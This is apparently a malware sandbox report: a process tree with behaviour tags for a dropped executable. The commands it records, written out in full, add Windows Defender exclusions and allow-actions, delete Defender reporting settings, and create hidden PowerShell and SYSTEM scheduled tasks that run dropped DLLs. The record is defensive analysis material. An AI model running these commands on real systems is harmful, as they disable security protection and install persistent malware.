C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\eIbkjtffPnzBjHv\EgorIPt.exeC:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\eIbkjtffPnzBjHv\EgorIPt.exe hl /YHsite_idMhh 385118 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:2496 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3944 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
- Suspicious use of WriteProcessMemory
PID:3680 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:3180
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:2340
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:3336
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:3088
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:4940
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:1004
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:5108
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:1952
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:1476
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:2296
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:2652
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:3228
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:876
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:3656
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:3116
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:1612
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:2032
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:1316
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:4952
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:636
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:4864
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:4924
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:3968
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:396
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:4584
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:1872
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:2456
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:2968
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LCifMpYymZWU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LCifMpYymZWU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gbPxNkbXHfUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gbPxNkbXHfUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mVqQIGUXDOgrC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mVqQIGUXDOgrC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yvWovCiVU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yvWovCiVU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\WkkDuRgYrrqHXcVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\WkkDuRgYrrqHXcVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\IzRZTwSZebgYVSAl\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\IzRZTwSZebgYVSAl\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4148 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCifMpYymZWU2" /t REG_DWORD /d 0 /reg:323⤵PID:3200
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCifMpYymZWU2" /t REG_DWORD /d 0 /reg:324⤵PID:624
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCifMpYymZWU2" /t REG_DWORD /d 0 /reg:643⤵PID:844
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gbPxNkbXHfUn" /t REG_DWORD /d 0 /reg:323⤵PID:2656
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gbPxNkbXHfUn" /t REG_DWORD /d 0 /reg:643⤵PID:2036
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mVqQIGUXDOgrC" /t REG_DWORD /d 0 /reg:323⤵PID:5012
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mVqQIGUXDOgrC" /t REG_DWORD /d 0 /reg:643⤵PID:440
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yucluTmaHGGxjmhxbXR" /t REG_DWORD /d 0 /reg:323⤵PID:1076
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yucluTmaHGGxjmhxbXR" /t REG_DWORD /d 0 /reg:643⤵PID:1776
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yvWovCiVU" /t REG_DWORD /d 0 /reg:323⤵PID:3336
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yvWovCiVU" /t REG_DWORD /d 0 /reg:643⤵PID:1916
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\WkkDuRgYrrqHXcVB /t REG_DWORD /d 0 /reg:323⤵PID:3100
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\WkkDuRgYrrqHXcVB /t REG_DWORD /d 0 /reg:643⤵PID:3876
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:348
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:1836
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:608
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:2144
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko /t REG_DWORD /d 0 /reg:323⤵PID:4416
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko /t REG_DWORD /d 0 /reg:643⤵PID:4876
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\IzRZTwSZebgYVSAl /t REG_DWORD /d 0 /reg:323⤵PID:1628
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\IzRZTwSZebgYVSAl /t REG_DWORD /d 0 /reg:643⤵PID:3632
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gdpmmtWmH" /SC once /ST 04:41:13 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
PID:968
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gdpmmtWmH"2⤵PID:4788
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gdpmmtWmH"2⤵PID:3528
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ZJggANjsYpCqsGjEe" /SC once /ST 06:55:04 /RU "SYSTEM" /TR "\"C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe\" UK /jpsite_idMXE 385118 /S" /V1 /F2⤵
- Creates scheduled task(s)
PID:3024
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "ZJggANjsYpCqsGjEe"2⤵PID:1952
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4116 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:3832
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:1468
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2904
-
C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exeC:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\vrgkBCY.exe UK /jpsite_idMXE 385118 /S1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1480 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bCAdHbOFiqtMCRhbmR"2⤵PID:3656
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵PID:3236
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:3340
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵PID:4364
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:4352
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\yvWovCiVU\XssxXq.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "eGwAoTnpAObQfPU" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1848
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "eGwAoTnpAObQfPU2" /F /xml "C:\Program Files (x86)\yvWovCiVU\XVlIWUm.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4456
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "eGwAoTnpAObQfPU"2⤵PID:2968
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "eGwAoTnpAObQfPU"2⤵PID:2172
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ALvbXdfFiQJKEp" /F /xml "C:\Program Files (x86)\LCifMpYymZWU2\ueYJqSK.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4004
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "BIiSjOILpRnDn2" /F /xml "C:\ProgramData\WkkDuRgYrrqHXcVB\cCOsyeg.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4756
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "uCAhUOuaRBfXDMltv2" /F /xml "C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\UZvEQmh.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:1396
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "cLzKLCJHWfKFSkdKasF2" /F /xml "C:\Program Files (x86)\mVqQIGUXDOgrC\TowwiFL.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:2464
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "kkPqOHrufYpxTagPJ" /SC once /ST 00:43:47 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\IzRZTwSZebgYVSAl\dtcklUpX\GDSPlEO.dll\",#1 /gTsite_idEKr 385118" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:964
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "kkPqOHrufYpxTagPJ"2⤵PID:2824
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:322⤵PID:2460
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:808
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:642⤵PID:1488
-
